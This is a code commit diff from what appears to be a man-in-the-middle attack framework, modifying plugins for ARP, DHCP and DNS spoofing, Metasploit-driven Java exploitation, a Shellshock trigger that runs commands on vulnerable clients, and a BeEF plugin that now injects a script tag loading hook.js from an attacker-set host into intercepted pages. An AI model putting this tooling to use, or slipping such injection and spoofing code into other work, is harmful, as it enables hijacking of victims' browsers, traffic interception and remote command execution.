fixed beefapi error, beefautorun now injects hook url and updated arguments, misc code style fixes

bdfactory

@@ -1 +1 @@
-Subproject commit 20fe713d7818c60235ff65d8fc3988e4b464466c
+Subproject commit 815add35f7db409bbc9faed898765272b93092a2

plugins/BeefAutorun.py

@@ -1,4 +1,5 @@
 from plugins.plugin import Plugin
+from plugins.Inject import Inject
 from time import sleep
 import sys
 import json
@@ -15,19 +16,21 @@ requests_log = logging.getLogger("requests")  #Disables "Starting new HTTP Conne
 requests_log.setLevel(logging.WARNING)
 
 
-class BeefAutorun(Plugin):
+class BeefAutorun(Inject, Plugin):
 	name = "BeEFAutorun"
 	optname = "beefauto"
 	has_opts = True
-	desc = "Autoruns BeEF modules based on Browser or OS type"
+	desc = "Injects BeEF hooks & autoruns modules based on Browser or OS type"
 
 	def initialize(self, options):
 		self.options = options
-		self.autoruncfg =  options.autoruncfg or "./config_files/beefautorun.cfg"
+		self.autoruncfg =  options.autoruncfg
+		self.hookip = options.hookip
 		self.beefip = options.beefip
 		self.beefport = options.beefport
 		self.beefuser = options.beefuser
 		self.beefpass = options.beefpass
+		self.dis_inject = options.dis_inject
 
 		beef = beefapi.BeefAPI({"host": self.beefip, "port": self.beefport})
 		if beef.login(self.beefuser, self.beefpass):
@@ -41,6 +44,13 @@ class BeefAutorun(Plugin):
 		self.All_modules = userconfig["ALL"]
 		self.Targeted_modules = userconfig["targets"]
 
+		if self.dis_inject:
+			if not self.hookip:
+				sys.exit("[-] BeEFAutorun requires --hookip")
+			Inject.initialize(self, options)
+			self.count_limit = 1
+			self.html_payload = '<script type="text/javascript" src="http://%s:%s/hook.js"></script>' % (self.hookip, self.beefport)
+
 		print "[*] BeEFAutorun plugin online => Mode: %s" % self.Mode
 		t = threading.Thread(name="autorun", target=self.autorun, args=(beef,))
 		t.setDaemon(True)
@@ -107,8 +117,10 @@ class BeefAutorun(Plugin):
 									sleep(0.5)
 
 	def add_options(self, options):
+		options.add_argument('--hookip', dest='hookip', help="Hook IP")
 		options.add_argument('--beefip', dest='beefip', default='127.0.0.1', help="IP of BeEF's server [default: localhost]")
 		options.add_argument('--beefport', dest='beefport', default='3000', help="Port of BeEF's server [default: 3000]")
 		options.add_argument('--beefuser', dest='beefuser', default='beef', help='Username for beef [default: beef]')
 		options.add_argument('--beefpass', dest='beefpass', default='beef', help='Password for beef [default: beef]')
-		options.add_argument('--autoruncfg', type=file, help='Specify a config file [default: beefautorun.cfg]')
+		options.add_argument('--autoruncfg', type=file, default="./config_files/beefautorun.cfg", help='Specify a config file [default: beefautorun.cfg]')
+		options.add_argument('--disable-inject', dest='dis_inject', action='store_true', default=True, help='Disables automatically injecting the hook url')

plugins/BrowserProfiler.py

@@ -32,7 +32,7 @@ class BrowserProfiler(Inject, Plugin):
             if self.dic_output['plugin_list'] > 0:
                 self.dic_output['plugin_list'] = self.dic_output['plugin_list'].split(',')
             pretty_output = pformat(self.dic_output)
-            logging.warning("%s >> Browser Profiler data:\n%s" % (request.client.getClientIP(), pretty_output))
+            logging.info("%s >> Browser Profiler data:\n%s" % (request.client.getClientIP(), pretty_output))
 
     def get_payload(self):
         payload = """<script type="text/javascript">

plugins/Inject.py

@@ -56,7 +56,7 @@ class Inject(CacheKill, Plugin):
             return
 
     def _get_payload(self):
-        return self._get_js()+self._get_iframe()+self.html_payload
+        return self._get_js() + self._get_iframe() + self.html_payload
 
     def add_options(self,options):
         options.add_argument("--js-url", type=str, help="Location of your (presumably) malicious Javascript.")

plugins/JavaPwn.py

@@ -30,7 +30,7 @@ class JavaPwn(BrowserProfiler, Plugin):
         self.msfport = options.msfport
         self.rpcip = options.rpcip
         self.rpcpass = options.rpcpass
-        self.javapwncfg = options.javapwncfg or './config_files/javapwn.cfg'
+        self.javapwncfg = options.javapwncfg
 
         if not self.msfip:
             sys.exit('[-] JavaPwn plugin requires --msfip')
@@ -182,7 +182,7 @@ class JavaPwn(BrowserProfiler, Plugin):
         options.add_argument('--msfport', dest='msfport', default='8080', help='Port of MSF web-server [default: 8080]')
         options.add_argument('--rpcip', dest='rpcip', default='127.0.0.1', help='IP of MSF MSGRPC server [default: localhost]')
         options.add_argument('--rpcpass', dest='rpcpass', default='abc123', help='Password for the MSF MSGRPC server [default: abc123]')
-        options.add_argument('--javapwncfg', type=file, help='Specify a config file [default: javapwn.cfg]')
+        options.add_argument('--javapwncfg', type=file, default="./config_files/javapwn.cfg", help='Specify a config file [default: javapwn.cfg]')
 
     def finish(self):
         '''This will be called when shutting down'''

plugins/Spoof.py

@@ -36,11 +36,11 @@ class Spoof(Plugin):
         self.arp = options.arp
         self.icmp = options.icmp
         self.dns = options.dns
-        self.dnscfg = options.dnscfg or "./config_files/dns.cfg"
+        self.dnscfg = options.dnscfg
         self.dhcp = options.dhcp
-        self.dhcpcfg = options.dhcpcfg or "./config_files/dhcp.cfg" 
+        self.dhcpcfg = options.dhcpcfg 
         self.shellshock = options.shellshock
-        self.cmd = options.cmd or "echo 'pwned'"
+        self.cmd = options.cmd
         self.gateway = options.gateway
         #self.summary = options.summary
         self.target = options.target
@@ -86,6 +86,9 @@ class Spoof(Plugin):
 
         elif self.dhcp:
             print "[*] DHCP Spoofing enabled"
+            if self.target:
+                sys.exit("[-] --target argument invalid when DCHP spoofing")
+
             self.rand_number = []
             self.dhcp_dic = {}
             self.dhcpcfg = ConfigObj(self.dhcpcfg)
@@ -308,9 +311,9 @@ class Spoof(Plugin):
         group.add_argument('--dhcp', dest='dhcp', action='store_true', default=False, help='Redirect traffic using DHCP offers')
         options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Modify intercepted DNS queries')
         options.add_argument('--shellshock', dest='shellshock', action='store_true', default=False, help='Trigger the Shellshock vuln when spoofing DHCP')
-        options.add_argument('--cmd', type=str, dest='cmd', help='Command to run on vulnerable clients [default: echo pwned]')
+        options.add_argument('--cmd', type=str, dest='cmd', default="echo 'pwned'", help='Command to run on vulnerable clients [default: echo pwned]')
-        options.add_argument("--dnscfg", type=file, help="DNS tampering config file [default: dns.cfg]")
+        options.add_argument("--dnscfg", type=file, default="./config_files/dns.cfg", help="DNS tampering config file [default: dns.cfg]")
-        options.add_argument("--dhcpcfg", type=file, help="DHCP spoofing config file [default: dhcp.cfg]")
+        options.add_argument("--dhcpcfg", type=file, default="./config_files/dhcp.cfg", help="DHCP spoofing config file [default: dhcp.cfg]")
         options.add_argument('--iface', dest='interface', help='Specify the interface to use')
         options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP')
         options.add_argument('--target', dest='target', help='Specify a host to poison [default: subnet]')
@@ -328,7 +331,7 @@ class Spoof(Plugin):
             print '\n[*] Flushing iptables'
             os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')
 
-        if self.dns:
+        if (self.dns or self.hsts):
             self.q.unbind(socket.AF_INET)
             self.q.close()